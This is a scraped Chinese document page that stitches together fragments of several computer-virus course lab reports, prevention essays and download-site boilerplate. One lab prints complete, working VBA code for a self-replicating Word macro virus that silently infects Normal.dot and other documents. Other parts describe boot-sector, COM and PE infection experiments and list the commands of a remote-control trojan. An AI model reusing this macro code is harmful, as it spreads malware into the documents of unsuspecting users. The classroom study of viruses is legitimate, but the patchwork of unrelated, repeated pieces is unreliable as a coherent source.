计算机病毒及防治实验报告081310128王晨雨
- 格式:doc
- 大小:5.39 MB
- 文档页数:43
计算机病毒与防火墙实验报告北理工说明1.本课程作业报告就是《计算机病毒与反病毒》课程成绩测评的重要依据,须认真完成。
2.报告内容严禁出现雷同,每位同学须独立完成。
若发现抄袭,抄袭者和被抄袭者本课程的成绩均以零分计。
3.必须排印,格式应当规范,图片一律使用JPG格式(非BMP格式)。
为防止剽窃,用图像编辑软件在图片右下角“内嵌”自己的学号或姓名。
实验报告的格式与否规范、图片与否内嵌了自己的学号或姓名,就是评价报告质量的考量因素。
4.说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。
5.只递交报告电子版。
在规定的日期内,通过电子邮件发送至[emailprotected],若三天之内没接到内容为“已接到”的答复证实Email,恳请再次传送或电话联系任课老师。
6.为了便于归档,实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”,如“张三-计算机病毒课程报告.doc”。
特别注意:递交报告截至日期以QQ群通告时间为依据(通常在考试周下周周三),若因没及时递交实验报告,引致课程成绩为“不及格”的,责任自私。
实验一程序的自动启动一、实验目的`(1)验证利用注册表特殊键值自动启动程序的方法;(2)检查和熟识杀毒软件各组成部分的自动启动方法。
二、实验内容与要求(1)在注册表自动读取程序主键中,嵌入读取目标程序键值(自己指派任一程序),重新启动操作系统,检查与否能够自动顺利读取目标程序。
罗列5或5个以上能够自动启动目标程序的键值,用其中某一个启动自己指派的程序。
(2)检查/分析你所使用的计算机中杀毒软件系统托盘程序、底层驱动程序等组成部分的自动启动方式。
三、实验环境与工具操作系统:Windows XP/Windows Vista/Windows 7工具软件:RegEdit.exe,AutoRuns,或其他注册表工具软件;杀毒软件四、实验步骤与实验结果一)按启动文件夹的方法1、“启动”文件夹是最常见的自启动文件夹。
计算机病毒的防御及清除一、病毒的传染途径病毒的传染途径主要有以下两种。
1.通过外储存器传染:使用不明渠道来的系统盘、软件、游戏等是最普遍的传染途径,由于使用带有病毒的软盘、活动硬盘、盗版光盘,使机器感染病毒,并传染给未被感染的“干净”的系统。
2.通过网络传染:在网络上浏览、下载文件或接收E-mail,都会受到病毒的侵蚀和感染,这种传染扩散极快,能在短时间内传遍正在网络上运行的机器。
二、预防病毒的措施一般来说,计算机病毒预防分为两种:管理方法的预防和技术上的预防,而在一定的程度上,将两种方法结合是行之有效的病毒预防措施。
用管理手段预防计算机病毒的传染,有下面三个措施。
1.不在计算机上使用来历不明的软盘。
2.经常对计算机和软盘进行病毒检测。
3.在网上下载的软件要先通过病毒检测后在使用。
可采用一定的技术手段预防计算机病毒的传染,例如使用“病毒防火墙”的软件,预防计算机病毒对系统的侵入,或发现病毒欲传染系统时,向用户发出警报。
“病毒防火墙”这一概念是伴随着Internet 及网络安全技术引入的,它的原理是实时“过滤”,当应用程序对文件或邮件进行打开、关闭、执行、保存、发送时,首先自动清除文件中包含的病毒,之后在完成用户的操作,保护计算机系统不受任何来自“本地”或“远程”病毒的危害,同时也防止“本地”系统内的病毒向网络或其它介质扩散。
四、病毒的清除目前的病毒破坏力越来越强,几乎所有的软、硬件故障都有可能与病毒有牵连。
而检查和清除病毒的最佳办法就是使用各种杀毒软件。
McAfee ViruScan 软件是世界上最早开发、最著名的反病毒软件,也是最早进入我国的杀毒软件。
Norton AntiVirus 软件是集防毒、查毒、杀毒功能于一身的综合性病毒防治软件。
我国的病毒清查技术目前已逐步走向成熟,市场上也出现了一些世界领先水平的杀毒软件,例如,KV3000、KILL和VRV等。
一般来说,无论是国外还是国内的杀毒软件,都能不同程度地解决一些病毒困扰的问题,但任何一种杀毒软件都不可能解决所有问题。
对计算机病毒的报告在信息化技术高速发展的今天,计算机成为涉及人们生活的各个领域的不可缺少的现代化工具,计算机在各个领域的普遍应用,给人们带来了极大的方便。
任何事物都具有两面性,计算机也不例外,它也是一把两面开刃的刀子,当他感染了计算机病毒以后,又具有非常强大的破坏力。
为了解计算机病毒的成因、破坏性和有效防范方法,笔者对计算机病毒进行了一些简单的调查研究。
一、对计算机病毒进行调查的一些数据整理(一)什么是计算机病毒计算机病毒(Computer Virus)在《中华人民共和国计算机信息系统安全保护条例》中被明确定义,所谓计算机病毒指“编制者在计算机程序中插入的破坏计算机功能或者破坏数据,影响计算机使用并且能够自我复制的一组计算机指令或者程序代码”。
与医学上的“病毒”不同,计算机病毒不是天然存在的,是某些人利用计算机软件和硬件所固有的脆弱性编制的一组指令集或程序代码。
它能通过某种途径潜伏在计算机的存储介质(或程序)里,当达到某种条件时即被激活,通过修改其他程序的方法将自己的精确拷贝或者可能演化的形式放入其他程序中,从而感染其他程序,对计算机资源进行破坏。
由此可见,所谓的病毒就是人为造成的,而且对其他用户的危害性很大。
(二)计算机病毒的特点1、隐蔽性:病毒程序大都小巧玲珑,一般只有几百或1k字节,可以隐蔽在可执行文件夹或数据文件中,有的可以通过病毒软件检查出来,有的根本就查不出来。
一般在没有防护措施的情况下,计算机病毒程序取得系统控制权后,可以在很短的时间里感染大量程序。
而且受到传染后,计算机系统通常仍能正常运行,使用户不会感到任何异常。
2、传染性:传染性是病毒的一个重要特征,也是确定一个程序是否是计算机病毒的首要条件。
病毒具有很强的再生机制,它通过各种渠道从已被感染的计算机扩散到未被感染的计算机,这段程序代码一旦进入计算机并得以执行,它会搜寻其他符合其传染条件的程序或存储介质,确定目标后再将自身代码插入其中,达到自我繁殖的目的。
计算机病毒实验报告Record the situation and lessons learned, find out the existing problems andform future countermeasures.姓名:___________________单位:___________________时间:___________________编号:FS-DY-20614计算机病毒实验报告说明1.本课程作业报告是《计算机病毒与反病毒》课程成绩评定的重要依据,须认真完成。
2.报告内容严禁出现雷同,每位同学须独立完成。
若发现抄袭,抄袭者和被抄袭者本课程的成绩均以零分计。
3.要排版,格式应规范,截图一律采用JPG格式(非BMP格式)。
为避免抄袭,用图像编辑软件在截图右下角“嵌入”自己的学号或姓名。
实验报告的格式是否规范、截图是否嵌入了自己的学号或姓名,是评价报告质量的考量因素。
4.说明文字与实验截图相配合,若只有说明文字,或只有截图,则成绩为不及格。
5.只提交报告电子版。
在规定的日期内,通过电子邮件发送到[emailprotected],若三天之内没有收到内容为“已收到”的回复确认Email,请再次发送或电话联系任课老师。
6.为了便于归档,实验报告Word文档的命名方式是“学号姓名-计算机病毒实验报告.doc”,如“20xx12345张三-计算机病毒课程报告.doc”。
注意:提交报告截止日期以QQ群通知时间为准(一般在考试周下周周三),若因没有及时提交实验报告,导致课程成绩为“缺考”的,责任自负。
实验一程序的自动启动一、实验目的(1)验证利用注册表特殊键值自动启动程序的方法;(2)检查和熟悉杀毒软件各组成部分的自动启动方法。
二、实验内容与要求(1)在注册表自动加载程序主键中,添加加载目标程序键值(自己指派任意程序),重启操作系统,检查是否能自动成功加载目标程序。
罗列5或5个以上能自动启动目标程序的键值,并用其中某一个启动自己指派的程序。
计算机宏病毒分析及清除实验一、实验目的1.了解“宏病毒”机理。
2.掌握清除宏病毒的方法。
3.掌握采用“宏”和脚本语言进行编程的技术。
二、实验环境1.Windows XP操作系统。
2.Office Word 2010字处理软件。
三、实验要求1.宏的编写。
2.理解宏病毒的作用机制。
四、实验内容与步骤:1.软件设置首先检查电脑里杀毒软件是否开启,如果开启需要关闭它。
然后打开一个word 文档(我直接打开的“计算机宏病毒分析及清除实验”),依次单击“文件”——“选项”,然后在弹出的“word选项”对话框中单击“信任中心”,然后再单击“信任中心设置”——“宏设置”。
选择“启用所有宏”,“信任对VBA工程对象模型的访问”。
2.宏病毒实现自我复制功能打开一个word文档(我打开的“计算机宏病毒分析及清除实验”),然后按Alt+F11调用宏编写窗口,在左侧菜单栏中依次单击“project(计算机宏病毒分析及清除实验)”—“Microsoft Word对象”—“ThisDocument”,在这里输入实验代码单击“保存”,这时该文档就含有了宏病毒,然后单击“执行”,就立刻弹出一个窗口,第二次打开该文档,就自动执行以上代码,并将自身复制到Normal.dot 和当前文档的ThisDocument中,此时所有的word文档关闭时,都将运行以上的病毒代码,产生影响。
我又新建立了一个名字为“111”的word文档,打开后关闭就弹出一个提示框。
代码如下:'Macro-1:Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar = FalseOptions.SaveNormalPrompt = FalseSet ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule Set host = NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument = NormalTemplate ThenSet host = ActiveDocument.VBProject.VBComponents(1).CodeModule End IfWith hostIf .Lines(1, 1) <> "'Micro-Virus" Then.DeleteLines 1, .CountOfLines.InsertLines 1, ourcodemodule.Lines(1, 100).ReplaceLine 2, "Sub Document_Close()"If ThisDocument = NormalTemplate Then.ReplaceLine 2, "Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox "B1104-何家红-16"End Sub结果显示如下:上图为复制完代码保存后,单击执行的结果图上图为模板被感染病毒的结果图上图为新建文档“111”被感染病毒结果图3.具有一定破坏性的宏本程序是以著名宏病毒“台湾一号”的恶意代码部分为基础,对源代码进行了适当的修改,这样降低了破坏性,否则实验室机器将受到严重影响。
计算机病毒分析报告1. 引言计算机病毒是指一类能够自我复制并传播的恶意软件,它们可以对计算机系统和数据造成严重的破坏。
本文将对计算机病毒进行分析,以便更好地了解其工作原理并提供相应的防范措施。
2. 病毒的传播方式计算机病毒可以通过多种方式传播,常见的方式包括:•电子邮件附件:病毒会通过电子邮件发送感染了的附件,当用户打开附件时,病毒会侵入计算机系统并开始传播。
•可移动存储设备:病毒可以通过USB闪存驱动器、移动硬盘等可移动存储设备传播,当用户将感染了的设备连接到计算机上时,病毒会自动复制并传播。
•恶意网站:黑客可以通过制作恶意网站来传播病毒,当用户访问这些网站时,病毒会被下载并感染用户的计算机。
•P2P文件共享:某些P2P文件共享软件可能存在病毒,当用户下载并运行这些文件时,病毒会感染计算机系统。
3. 病毒的工作原理一旦计算机感染了病毒,病毒会开始执行其恶意行为。
常见的病毒行为包括:•自我复制:病毒会在计算机系统中复制自己的文件,并将这些文件传播到其他系统中。
•数据破坏:某些病毒会破坏计算机中的数据,导致文件损坏或丢失。
•信息窃取:一些病毒会窃取用户的个人信息,如用户名、密码等,并将这些信息发送给黑客。
•远程控制:某些病毒可以使黑客远程控制感染了的计算机,从而获取更多的权限并进行进一步的攻击。
4. 病毒的防范措施为了有效地防范计算机病毒,我们可以采取以下措施:•安装杀毒软件:定期更新和使用可靠的杀毒软件可以帮助检测和删除计算机中的病毒。
•邮件过滤:使用具有良好邮件过滤功能的电子邮件客户端可以帮助阻止病毒通过电子邮件传播。
•小心下载和运行:避免下载和运行来自不可信来源的文件,特别是那些可疑的附件或软件。
•更新操作系统和应用程序:定期安装操作系统和应用程序的更新补丁,以修复已知漏洞和提高安全性。
•经常备份数据:定期备份重要数据可以确保即使感染了病毒,也能够恢复数据。
5. 结论计算机病毒是一种常见的威胁,可以对个人和组织的计算机系统和数据造成严重的破坏。
关于电脑病毒的研究报告关于电脑病毒的讨论报告一、问题的提出。
我家的电脑有时候会中病毒,病毒会使电脑的网速变慢,电脑还会常常死机。
不少同学家里的的电脑也会中病毒,病毒给我们带来了不少麻烦。
所以,我对电脑病毒这一问题,做了个简洁的讨论调查。
二、讨论调查的数据整理。
1、电脑病毒的熟悉和了解。
电脑病毒是一些心术不正的人恶意制造的电脑程序。
它对电脑进行不同程度的破坏,一些木马程序能在人们不知情的状况下潜入电脑盗取他人信息,或对电脑实行非法掌握。
制造电脑病毒就像投毒一样,是一种危害社会的犯罪行为。
目前,已经发觉的电脑病毒种类越来越多,像“熊猫烧香”病毒、“CIH”病毒、“冲击波”病毒、消息尾巴病毒等。
2、电脑病毒的传播途径。
电脑病毒主要是以附件的形式进行传播,由于人们可以将任何类型的文件做为附件发送,而大部分电脑病毒防护软件在这方面的功能也不是非常完善,使得电子邮件成为当今世界上传播电脑病毒最主要的途径。
3、电脑病毒对电脑的破坏。
电脑病毒破坏电脑程序的花样许多,有的病毒会把电脑应执行的程1/ 3序弄得无法执行;有的病毒不断产生一些莫名其妙的数据,侵占电脑里储存信息的空间,弄得使用者无法工作;有的病毒把原来排列有序的磁盘文件弄得无规可循,让使用者找不到要用的东西。
总而言之,病毒在电脑网络中胡闹、破坏,使网络与电脑受到损害。
三、应付电脑病毒的方法。
1、不使用盗版和来历不明的软件,不任凭打开不明电子邮件及其附件。
2、使用软盘、光碟或U盘前要先用杀毒软件进行检测。
3、安装杀毒软件与防火墙,定期检测系统与清除病毒。
应付电脑病毒一般的做法是安装杀毒软件。
常见的杀毒软件有:瑞星、金山毒霸、360平安卫士、卡巴斯基等。
四、问题的结论。
1、电脑病毒是心术不正的人恶意制造的电脑程序,有些电脑病毒可以盗取他人消息,或对电脑实行非法掌握。
目前,电脑病毒种类越来越多,像“熊猫烧香”病毒、“CIH”病毒、“冲击波”病毒、消息尾巴病毒等。
浅谈计算机病毒及防范措施开题报告范文下载提示:该文档是本店铺精心编制而成的,希望大家下载后,能够帮助大家解决实际问题。
浅谈计算机病毒及防范措施开题报告范文该文档下载后可定制修改,请根据实际需要进行调整和使用,谢谢!本店铺为大家提供各种类型的实用资料,如教育随笔、日记赏析、句子摘抄、古诗大全、经典美文、话题作文、工作总结、词语解析、文案摘录、其他资料等等,想了解不同资料格式和写法,敬请关注!Download tips: This document is carefully compiled by this editor. I hope that after you download it, it can help you solve practical problems. The document 浅谈计算机病毒及防范措施开题报告范文 can be customized and modified after downloading, please adjust and use it according to actual needs, thank you! In addition, this shop providesyou with various types of practical materials, such as educational essays, diary appreciation, sentence excerpts, ancient poems, classic articles, topic composition, work summary, word parsing, copy excerpts, other materials and so on, want to knowdifferent data formats and writing methods, please pay attention!计算机病毒及防范措施:计算机病毒是一种具有破坏性的计算机程序,能够在计算机系统中自我复制并传播,对计算机系统造成不同程度的危害。
计算机病毒与反病毒技术研究报告摘要:随着计算机病毒越来越猖撅,计算机安全越来越受到人们的重视,计算机反病毒技术也发展得越来越快。
本文介绍了当今最新最先进的计算机反病毒技术,有cpu反病毒技术、实时反病毒技术、虚拟机技术和主动内核技术等。
而且从多个角度探讨了计算机网络反病毒的几点策略。
关键字:计算机病毒反病毒网络病毒一、计算机病毒计算机病毒对计算机网络影响是灾难*的。
从80年的“蠕虫”“小球”病毒起至今,计算机使用者都在和计算机病毒斗争,创造了形形**的病毒产品和方案。
但是随着近年inter的发展,e-mail和一批网络工具的出现改变了人类信息的传播方式和生活,同时也使计算机病毒的种类迅速增加,扩散速度大大加快,出现了一批新的传播方式和表现力的病毒,对企业及个人用户的破坏*和传染力是以往的病毒类型所不可比拟的。
病毒的主发地点和传播方式己经由以往的单机之间的介质传染完成了向网络系统的转化,类似于“cih,melisa,exploer”网络传染*质的病毒大量出现,一旦企业或单位被病毒侵入并发作,造成的损失和责任是难以承受的。
病毒和防病毒之间的斗争已经进入了由“杀”病毒到“防”病毒的时代。
企业或单位只有拒病毒于网络之外,才能保*数据的真正安全。
二、几种反病毒技术研究1.cpu反病毒之所以病毒和黑客能非常容易地攻击计算机,原因在于网络都是互通的,交换信息的过程中,计算机网络中会建立许多通道,但是设计者并没有过多考虑这个问题,所以只要是信息在通道中通过,都可能被认为是安全信息给予“放行”,所以这就给计算机带来了极大风险。
经过多年努力,俄罗斯科学院计算系统微处理研究所的鲍利斯·巴巴扬通讯院士开发出了一种新型微处理器(cpu),被反病毒界认为成功实现了cpu反病毒,这种cpu可以识别病毒程序,对含有病毒程序的信息给予“抵抗”,同时将这些含有病毒的程序“监禁”起来,同时还可以给这些病毒程序一些数据让它去执行,以免因为空闲而危害计算机,所以这种方法基本上隔离了病毒,让病毒失去了传播的机会。
计算机病毒及其防范措施
计算机病毒是指针对计算机系统进行攻击的恶意程序,
具有自我复制、传播、感染和损害等特征。
通过攻击操作
系统、应用程序或数据文件,计算机病毒可以窃取用户信息、破坏数据、瘫痪系统等,严重影响计算机系统的正常
运行。
由于计算机病毒具有自我复制和传播的能力,一旦染上
病毒,很难立刻进行清除。
因此,预防计算机病毒非常重要。
以下是一些防范措施:
1.安装杀毒软件和防火墙:杀毒软件可以检测并清除已
经感染的病毒,防火墙可以阻止潜在威胁访问计算机系统。
要保持杀毒软件和防火墙的最新版本,并进行定期更新。
2.定期更新操作系统和软件程序:计算机病毒可以利用
已知漏洞攻击计算机系统。
因此,要及时更新操作系统和
软件程序,以修补漏洞并增强系统安全性。
3.不打开垃圾邮件和未知来源的文件:有些计算机病毒
将自己隐藏在电子邮件或下载的文件中。
要避免打开未知
来源或可疑的文件,尤其是垃圾邮件和未知来源的附件。
4.备份数据:即使遭受计算机病毒攻击,也可以通过备
份数据来避免数据丢失。
要将重要数据备份到云端或外部
硬盘等设备中。
5.使用密码锁定系统:使用密码锁定计算机系统可以防
止他人访问个人计算机,并保护个人信息不被窃取。
综上所述,预防计算机病毒需要从多个方面入手,包括
安装杀毒软件和防火墙、更新操作系统和软件程序、不打
开垃圾邮件和未知来源的文件、备份数据和使用密码锁定
系统等。
只有综合考虑这些措施,才能更好地保护个人电
脑和信息安全。
南京航空航天大学 计算机病毒及防治 上机实验报告
学院: 理学院 专业: 信息与计算科学 学号: 081310128 姓名: 王晨雨 授课老师: 薛明富
二〇一六年十二月—
欢迎下载 1 目录 实验一:引导型病毒实验.............................................. 2 实验二:Com病毒实验 ................................................ 6 实验三:PE文件格式实验 ............................................. 9 实验四:32位文件型病毒实验 ........................................ 11 实验五:简单的木马实验............................................. 14 实验七:木马病毒清除实验(选做)................................... 19 实验八:Word宏病毒实验(一) ...................................... 22 实验九:Word宏病毒实验(二) ...................................... 28 实验十:Linux脚本病毒实验(选做) ................................. 33 实验十二:基于U盘传播的蠕虫病毒实验............................... 34 实验十三:邮件型病毒实验........................................... 37 实验十四:Web恶意代码实验 ......................................... 40 —
欢迎下载 2 实验一:引导型病毒实验 【实验目的】 通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染病毒文件的方法,提高汇编语言的使用能力。 实验内容 引导阶段病毒由软盘感染硬盘实验。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。 DOS运行时病毒由硬盘感染软盘的实现。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。
【实验平台】
VMWare Workstation 12 PRO MS-DOS 7.10
【试验内容】
第一步:环境安装 安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。 第二步:软盘感染硬盘 1) 运行虚拟机,检查目前虚拟硬盘是否含有病毒,图1表示没有病毒正常启动硬盘的状态。 2) 在附书资源中复制含有病毒的虚拟软盘virus.img 3) 将含有病毒的软盘插入虚拟机引导,可以看到闪动的字符*^_^*,如图2所示,按任意键进入图3。 第三步:验证硬盘已经被感染 1) 取出虚拟软盘,通过硬盘引导,再次出现了病毒的画面如图4。 2) 按任意键后正常引导了DOS系统如图5。可见,硬盘已被感染。 第四步:硬盘感染软盘 1) 下载empty.img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图6. 2) 取出虚拟软盘,从硬盘启动,通过命令format A:/q快速格式化软盘。可能提示出错,这时只要按R键即可。如图7. 3) 成功格式化后的结果如图8。 4) 不要取出虚拟软盘,重新启动虚拟机,这时是从empty.img引导,可以看到病毒的画面,如图9。按任意键进入图10.可见,病毒已经成功由硬盘传染给了软盘。 — 欢迎下载 3 实验截图: 1. 软盘启动后: —
欢迎下载 4 2. 硬盘启动后: —
欢迎下载 5 —
欢迎下载 6 实验二:Com病毒实验 【实验目的】
1、掌握COM病毒的传播原理。 2、掌握MASM611编译工具的使用。
【实验平台】 1、MS-DOS 7.10 2、MASM611
【试验内容】 1、 安装MS-DOS 7.10环境。虚拟机安装该环境亦可,步骤在此不再赘述。 2、 在MS-DOS C:\MASM目录下安装MASM611,然后将binr目录下的link.exe复制到bin目录下。 3、 在com目录下复制病毒程序Virus.asm及测试程序源代码BeInfected.asm 4、 编译链接BeInfected.asm,形成BeInfectedcom测试程序 5、 编译链接virus.asm,生成病毒程序virus.exe。 6、 在C:\MASM\Bin目录下建立del.txt文件,并且将“test.com”和病毒代码2“virus.asm”复制到此目录下。 7、 执行“test.com”观察结果。 8、 编译并连接 “virus.asm” 生成“virus.exe”,执行此exe文件以感染“test.com”文件并且自动删除del.txt,而后执行“test.com”可以发现感染后的结果。 — 欢迎下载 7 实验截图: 1. 编译存储好文件:
2. Dos下查看文件夹内容: —
欢迎下载 8 3. 查看TEST的内容:
4. 运行病毒程序:
5. 查看感染病毒后文件夹内容: 6. 查看感染病毒后TEST的内容: —
欢迎下载 9 实验三:PE文件格式实验
【实验目的】 了解PE文件基本结构 【实验环境】 运行环境:Windows 2000、Windows 9x、Windows NT 以及 Windows XP 编译环境: Visual Studio 6.0
【实验步骤】 使用编译环境打开源代码工程,编译后可以生成winpe.exe。 预备步骤:找任意一个Win32下的Exe文件作为查看对象。 实验内容:运行winpe.exe,并打开任一exe文件,选择不同的菜单,可以查看到exe文件的内部结构。
实验截图: 感染前 感染后
第一处: 第二处:
第三处: —
欢迎下载 10 第四处: 第五处: 感染前:
感染后: —
欢迎下载 11 实验四:32位文件型病毒实验
【实验目的】 了解文件型病毒的基本制造过程 了解病毒的感染、破坏机制,进一步认识病毒程序 掌握文件型病毒的特征和内在机制
【实验环境】 运行环境Windows 2000、Windows 9x、Windows NT 和 Windows XP
【实验步骤】 目录中的virus.rar包中包括Virus.exe(编译的病毒程序)、软件使用说明书.doc(请仔细阅读)、源代码详解.doc(对代码部分加入了部分注释)以及pll.asm(程序源代码)。Example.rar包中选取的是一个常用程序(ebookedit)安装后的安装目录下的程序,用于测试病毒程序。 预备步骤:将example.rar解压到某个目录。解压完毕后,应该在该目录下有Buttons目录、ebookcode.exe、ebookedit.exe、ebrand-it.exe以及keymaker.exe等程序,然后把virus.rar包解压后的Virus.exe复制到该目录中。 实验内容:通过运行病毒程序观看各步的提示以了解病毒的内在机制。
实验截图: —
欢迎下载 12 1.感染前准备:
2.感染过程:
3.感染后: —
欢迎下载 13 4.感染文件比对 —
欢迎下载 14 实验五:简单的木马实验
【实验目的】 掌握木马的基本原理 【实验环境】
Windows XP 操作系统 Visual Studio 6.0 编程环境
【实验步骤】
(1) 复制实验文件到实验的计算机上。其中,SocketListener目录下是木马Server端源代码,SocketCommand目录下是木马Client端源代码。 (2) 用Visual Studio 6.0环境分别编译这两部分代码。 (3) 运行SocketListener应用程序,也就是启动了木马被控端。 (4) 运行SocketCommand应用程序,也就是启动了木马的控制端,可以在控制端执行命令来控制被控制端。实验支持的命令参考表:
命令 命令含义 CMD 执行应用程序 !SHUT 退出木马 FILEGET 获得远程文件 EDITCONF 编辑配置文件 LIST 列目录 VIEW 查看文件内容 CDOPEN 关CD CDCLOSE 开CD REBOOT 重启远端计算机 —
欢迎下载 15 实验截图: 1.建立连接:
2.发送指令及成功后结果: (1) 运行程序: